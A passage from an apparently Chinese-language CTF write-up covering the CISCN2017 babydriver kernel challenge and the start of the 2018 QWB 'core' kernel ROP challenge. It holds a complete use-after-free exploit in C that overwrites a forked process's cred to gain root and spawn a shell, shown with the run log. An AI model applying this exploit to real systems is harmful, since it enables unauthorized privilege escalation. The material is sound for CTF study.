</span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="err">00000000</span> <span class="nf">babydevice_t</span> <span class="no">struc</span> <span class="c">; (sizeof=0x10, align=0x8, copyof_429) </span><span class="c"></span><span class="mi">00000000</span> <span class="c">; XREF: .bss:babydev_struct/r </span><span class="c"></span><span class="mi">00000000</span> <span class="no">device_buf</span> <span class="no">dq</span> <span class="err">?</span> <span class="c">; XREF: babyrelease+6/r </span><span class="c"></span><span class="mi">00000000</span> <span class="c">; babyopen+26/w ... ; offset </span><span class="c"></span><span class="mi">00000008</span> <span class="no">device_buf_len</span> <span class="no">dq</span> <span class="err">?</span> <span class="c">; XREF: babyopen+2D/w </span><span class="c"></span><span class="mi">00000008</span> <span class="c">; babyioctl+3C/w ... </span><span class="c"></span><span class="mi">00000010</span> <span class="no">babydevice_t</span> <span class="no">ends</span> <span class="err">00000010</span> </code></pre></td></tr></table> </div> </div><p>再看一下主要函数</p> <p><strong>babyioctl:</strong> 定义了 0x10001 的命令，可以释放全局变量 babydev_struct 中的 device_buf，再根据用户传递的 size 重新申请一块内存，并设置 device_buf_len。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="c1">// local variable allocation has failed, the output may be wrong! </span><span class="c1"></span><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">babyioctl</span><span class="p">(</span><span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">command</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">arg</span><span class="p">)</span> <span class="p">{</span> <span class="n">size_t</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// rdx </span><span class="c1"></span> <span class="n">size_t</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// rdx </span><span class="c1"></span> <span class="n">_fentry__</span><span class="p">(</span><span class="n">filp</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">command</span><span class="p">);</span> <span class="n">v4</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">command</span> <span class="o">==</span> <span class="mh">0x10001</span> <span class="p">)</span> <span class="p">{</span> <span class="n">kfree</span><span class="p">(</span><span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span><span class="p">);</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">_kmalloc</span><span class="p">(</span><span class="n">v4</span><span class="p">,</span> <span class="mh">0x24000C0LL</span><span class="p">);</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf_len</span> <span class="o">=</span> <span class="n">v4</span><span class="p">;</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;alloc done</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mh">0x24000C0LL</span><span class="p">,</span> <span class="n">v5</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x013d</span><span class="s">efalut:arg is %ld</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v3</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>babyopen:</strong> 申请一块空间，大小为 0x40 字节，地址存储在全局变量 babydev_struct.device_buf 上，并更新 babydev_struct.device_buf_len</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">int</span> <span class="kr">__fastcall</span> <span class="nf">babyopen</span><span class="p">(</span><span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">)</span> <span class="p">{</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rdx </span><span class="c1"></span> <span class="n">_fentry__</span><span class="p">(</span><span class="n">inode</span><span class="p">,</span> <span class="n">filp</span><span class="p">);</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">kmem_cache_alloc_trace</span><span class="p">(</span><span class="n">kmalloc_caches</span><span class="p">[</span><span class="mi">6</span><span class="p">],</span> <span class="mh">0x24000C0LL</span><span class="p">,</span> <span class="mh">0x40LL</span><span class="p">);</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf_len</span> <span class="o">=</span> <span class="mi">64LL</span><span class="p">;</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;device open</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mh">0x24000C0LL</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>babyread:</strong> 先检查长度是否小于 babydev_struct.device_buf_len，然后把 babydev_struct.device_buf 中的数据拷贝到 buffer 中，buffer 和长度都是用户传递的参数</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">babyread</span><span class="p">(</span><span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="n">size_t</span> <span class="n">length</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">offset</span><span class="p">)</span> <span class="p">{</span> <span class="n">size_t</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rdx </span><span class="c1"></span> <span class="n">_fentry__</span><span class="p">(</span><span class="n">filp</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf_len</span> <span class="o">&gt;</span> <span class="n">v4</span> <span class="p">)</span> <span class="n">copy_to_user</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span><span class="p">,</span> <span class="n">v4</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>babywrite:</strong> 类似 babyread，不同的是从 buffer 拷贝到全局变量中</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">babywrite</span><span class="p">(</span><span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="n">size_t</span> <span class="n">length</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">offset</span><span class="p">)</span> <span class="p">{</span> <span class="n">size_t</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rdx </span><span class="c1"></span> <span class="n">_fentry__</span><span class="p">(</span><span class="n">filp</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf_len</span> <span class="o">&gt;</span> <span class="n">v4</span> <span class="p">)</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">v4</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>babyrelease:</strong> 释放空间，没什么好说的</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">int</span> <span class="kr">__fastcall</span> <span class="nf">babyrelease</span><span class="p">(</span><span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">)</span> <span class="p">{</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rdx </span><span class="c1"></span> <span class="n">_fentry__</span><span class="p">(</span><span class="n">inode</span><span class="p">,</span> <span class="n">filp</span><span class="p">);</span> <span class="n">kfree</span><span class="p">(</span><span class="n">babydev_struct</span><span class="p">.</span><span class="n">device_buf</span><span class="p">);</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;device release</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">filp</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>还有 babydriver_init() 和 babydriver_exit() 两个函数分别完成了 <strong>/dev/babydev</strong> 设备的初始化和清理，查一下函数的用法即可，不再分析。</p> <h4 id="思路">思路</h4> <p>没有用户态传统的溢出等漏洞，但存在一个伪条件竞争引发的 UAF 漏洞。</p> <p>也就是说如果我们同时打开两个设备，第二次会覆盖第一次分配的空间，因为 babydev_struct 是全局的。同样，如果释放第一个，那么第二个其实是被是释放过得，这样就造成了一个 UAF。</p> <p>那么有了 UAF 要怎么用呢？根据之前的分析，可以修改进程的 cred 结构。</p> <p>其中 4.4.72 的 cred 结构体 <a href="https://elixir.bootlin.com/linux/v4.4.72/source/include/linux/cred.h#L118">定义</a> 如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span> <span class="n">atomic_t</span> <span class="n">usage</span><span class="p">;</span> <span class="cp">#ifdef CONFIG_DEBUG_CREDENTIALS </span><span class="cp"></span> <span class="n">atomic_t</span> <span class="n">subscribers</span><span class="p">;</span> <span class="cm">/* number of processes subscribed */</span> <span class="kt">void</span> <span class="o">*</span><span class="n">put_addr</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="n">magic</span><span class="p">;</span> <span class="cp">#define CRED_MAGIC 0x43736564 </span><span class="cp">#define CRED_MAGIC_DEAD 0x44656144 </span><span class="cp">#endif </span><span class="cp"></span> <span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span> <span class="cm">/* real UID of the task */</span> <span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span> <span class="cm">/* real GID of the task */</span> <span class="n">kuid_t</span> <span class="n">suid</span><span class="p">;</span> <span class="cm">/* saved UID of the task */</span> <span class="n">kgid_t</span> <span class="n">sgid</span><span class="p">;</span> <span class="cm">/* saved GID of the task */</span> <span class="n">kuid_t</span> <span class="n">euid</span><span class="p">;</span> <span class="cm">/* effective UID of the task */</span> <span class="n">kgid_t</span> <span class="n">egid</span><span class="p">;</span> <span class="cm">/* effective GID of the task */</span> <span class="n">kuid_t</span> <span class="n">fsuid</span><span class="p">;</span> <span class="cm">/* UID for VFS ops */</span> <span class="n">kgid_t</span> <span class="n">fsgid</span><span class="p">;</span> <span class="cm">/* GID for VFS ops */</span> <span class="kt">unsigned</span> <span class="n">securebits</span><span class="p">;</span> <span class="cm">/* SUID-less security management */</span> <span class="n">kernel_cap_t</span> <span class="n">cap_inheritable</span><span class="p">;</span> <span class="cm">/* caps our children can inherit */</span> <span class="n">kernel_cap_t</span> <span class="n">cap_permitted</span><span class="p">;</span> <span class="cm">/* caps we&#39;re permitted */</span> <span class="n">kernel_cap_t</span> <span class="n">cap_effective</span><span class="p">;</span> <span class="cm">/* caps we can actually use */</span> <span class="n">kernel_cap_t</span> <span class="n">cap_bset</span><span class="p">;</span> <span class="cm">/* capability bounding set */</span> <span class="n">kernel_cap_t</span> <span class="n">cap_ambient</span><span class="p">;</span> <span class="cm">/* Ambient capability set */</span> <span class="cp">#ifdef CONFIG_KEYS </span><span class="cp"></span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">jit_keyring</span><span class="p">;</span> <span class="cm">/* default keyring to attach requested </span><span class="cm"> * keys to */</span> <span class="k">struct</span> <span class="n">key</span> <span class="n">__rcu</span> <span class="o">*</span><span class="n">session_keyring</span><span class="p">;</span> <span class="cm">/* keyring inherited over fork */</span> <span class="k">struct</span> <span class="n">key</span> <span class="o">*</span><span class="n">process_keyring</span><span class="p">;</span> <span class="cm">/* keyring private to this process */</span> <span class="k">struct</span> <span class="n">key</span> <span class="o">*</span><span class="n">thread_keyring</span><span class="p">;</span> <span class="cm">/* keyring private to this thread */</span> <span class="k">struct</span> <span class="n">key</span> <span class="o">*</span><span class="n">request_key_auth</span><span class="p">;</span> <span class="cm">/* assumed request_key authority */</span> <span class="cp">#endif </span><span class="cp">#ifdef CONFIG_SECURITY </span><span class="cp"></span> <span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span> <span class="cm">/* subjective LSM security */</span> <span class="cp">#endif </span><span class="cp"></span> <span class="k">struct</span> <span class="n">user_struct</span> <span class="o">*</span><span class="n">user</span><span class="p">;</span> <span class="cm">/* real user ID subscription */</span> <span class="k">struct</span> <span class="n">user_namespace</span> <span class="o">*</span><span class="n">user_ns</span><span class="p">;</span> <span class="cm">/* user_ns the caps and keyrings are relative to. */</span> <span class="k">struct</span> <span class="n">group_info</span> <span class="o">*</span><span class="n">group_info</span><span class="p">;</span> <span class="cm">/* supplementary groups for euid/fsgid */</span> <span class="k">struct</span> <span class="n">rcu_head</span> <span class="n">rcu</span><span class="p">;</span> <span class="cm">/* RCU deletion hook */</span> <span class="p">};</span> </code></pre></td></tr></table> </div> </div><p>那么根据 UAF 的思想，思路如下：</p> <ol> <li>打开两次设备，通过 ioctl 更改其大小为 cred 结构体的大小</li> <li>释放其中一个，fork 一个新进程，那么这个新进程的 cred 的空间就会和之前释放的空间重叠</li> <li>同时，我们可以通过另一个文件描述符对这块空间写，只需要将 uid，gid 改为 0，即可以实现提权到 root</li> </ol> <p>需要确定 cred 结构体的大小，有了源码，大小就很好确定了。计算一下是 0x8a（注意使用相同内核版本的源码）。</p> <h4 id="exploit">Exploit</h4> <p>注释都写在代码里了，<a href="https://github.com/bash-c/pwn_repo/blob/master/CISCN2017_babydriver/exploit.c">exploit here</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">CISCN2017_babydriver</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">exploit</span><span class="p">.</span><span class="n">c</span> <span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stropts.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/wait.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp"> </span><span class="cp"></span> <span class="kt">int</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// 打开两次设备 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">fd1</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/babydev&#34;</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="kt">int</span> <span class="n">fd2</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/babydev&#34;</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="c1">// 修改 babydev_struct.device_buf_len 为 sizeof(struct cred) </span><span class="c1"></span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd1</span><span class="p">,</span> <span class="mh">0x10001</span><span class="p">,</span> <span class="mh">0x8a</span><span class="p">);</span> <span class="c1">// 释放 fd1 </span><span class="c1"></span> <span class="n">close</span><span class="p">(</span><span class="n">fd1</span><span class="p">);</span> <span class="c1">// 新起进程的 cred 空间会和刚刚释放的 babydev_struct 重叠 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span> <span class="k">if</span><span class="p">(</span><span class="n">pid</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*] fork error!&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// 通过更改 fd2，修改新进程的 cred 的 uid，gid 等值为0 </span><span class="c1"></span> <span class="kt">char</span> <span class="n">zeros</span><span class="p">[</span><span class="mi">30</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">write</span><span class="p">(</span><span class="n">fd2</span><span class="p">,</span> <span class="n">zeros</span><span class="p">,</span> <span class="mi">28</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">getuid</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[+] root now.&#34;</span><span class="p">);</span> <span class="n">system</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">wait</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span> <span class="p">}</span> <span class="n">close</span><span class="p">(</span><span class="n">fd2</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><h4 id="get-root-shell">get root shell</h4> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">// 静态编译文件，kernel 中没有 libc CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> gcc exploit.c -static -o exploit CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> file exploit exploit: ELF 64-bit LSB executable, x86-64, version <span class="m">1</span> <span class="o">(</span>GNU/Linux<span class="o">)</span>, statically linked, <span class="k">for</span> GNU/Linux 3.2.0, BuildID<span class="o">[</span>sha1<span class="o">]=</span>90aabed5497b6922fda3d5118e4aa9cb2fa5ccc5, not stripped // 把编译好的 exp 解压后的目录下，重新打包 rootfs.cpio CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> cp exploit core/tmp CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> <span class="nb">cd</span> core core <span class="o">[</span>master●●<span class="o">]</span> find . <span class="p">|</span> cpio -o --format<span class="o">=</span>newc &gt; rootfs.cpio <span class="m">7017</span> 块 core <span class="o">[</span>master●●<span class="o">]</span> cp rootfs.cpio .. core <span class="o">[</span>master●●<span class="o">]</span> <span class="nb">cd</span> .. // kvm 需要有 root 权限 CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> sudo ./boot.sh ...... ...... / $ ls /tmp/ exploit / $ id <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> / $ /tmp/exploit <span class="o">[</span> 14.376187<span class="o">]</span> device open <span class="o">[</span> 14.376715<span class="o">]</span> device open <span class="o">[</span> 14.377201<span class="o">]</span> alloc <span class="k">done</span> <span class="o">[</span> 14.377629<span class="o">]</span> device release <span class="o">[</span>+<span class="o">]</span> root now. / <span class="c1"># id</span> <span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> / # </code></pre></td></tr></table> </div> </div><blockquote> <p>在后来的学习中，发现使用 <a href="http://blog.vmsplice.net/2011/09/how-to-share-files-instantly-between.html">SimpleHTTPServer</a> 来传输文件更加方便快捷。</p> </blockquote> <p>当然也可以用 rop 来做，放到下一篇分析</p> <h3 id="kernel-rop---2018强网杯---core">kernel ROP - 2018强网杯 - core</h3> <h4 id="分析-1">分析</h4> <p>题目给了 <code>bzImage</code>，<code>core.cpio</code>，<code>start.sh</code> 以及带符号表的 <code>vmlinux</code> 四个文件</p> <p>前三个文件我们已经知道了作用，<code>vmlinux</code> 则是静态编译，未经过压缩的 kernel 文件，相对应的 <code>bzImage</code> 可以理解为压缩后的文件，更详细的可以看 <a href="https://unix.stackexchange.com/questions/5518/what-is-the-difference-between-the-following-kernel-makefile-terms-vmlinux-vml">stackexchange</a></p> <p>vmlinux 未经过压缩，也就是说我们可以从 vmlinux 中找到一些 gadget，我们先把 gadget 保存下来备用。</p> <blockquote> <p>建议使用 <a href="https://github.com/sashs/Ropper">Ropper</a> 来寻找 gadget，在我测试时，ropper 用了两分半钟提取出了所有的 gadget，而 <a href="https://github.com/JonathanSalwan/ROPgadget">ROPgadget</a> 用了半个小时耗尽了内存还没跑出结果。。。</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">give_to_player <span class="o">[</span>master●<span class="o">]</span> <span class="nb">time</span> ropper --file ./vmlinux --nocolor &gt; g1 <span class="o">[</span>INFO<span class="o">]</span> Load gadgets from cache <span class="o">[</span>LOAD<span class="o">]</span> loading... 100% <span class="o">[</span>LOAD<span class="o">]</span> removing double gadgets... 100% ropper --file ./vmlinux --nocolor &gt; g1 147.42s user 25.68s system 111% cpu 2:35.17 total give_to_player <span class="o">[</span>master●<span class="o">]</span> <span class="nb">time</span> ROPgadget --binary ./vmlinux &gt; g2 <span class="o">[</span>2<span class="o">]</span> <span class="m">16597</span> killed ROPgadget --binary ./vmlinux &gt; g2 ROPgadget --binary ./vmlinux &gt; g2 1064.39s user 42.52s system 54% cpu 33:35.89 total </code></pre></td></tr></table> </div> </div><p>如果题目没有给 vmlinux，可以通过 <a href="https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux">extract-vmlinux</a> 提取。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> ./extract-vmlinux ./bzImage &gt; vmlinux CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> file vmlinux vmlinux: ELF 64-bit LSB executable, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, BuildID<span class="o">[</span>sha1<span class="o">]=</span>e993ea9809ee28d059537a0d5e866794f27e33b4, stripped </code></pre></td></tr></table> </div> </div><p>看一下 start.sh</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td 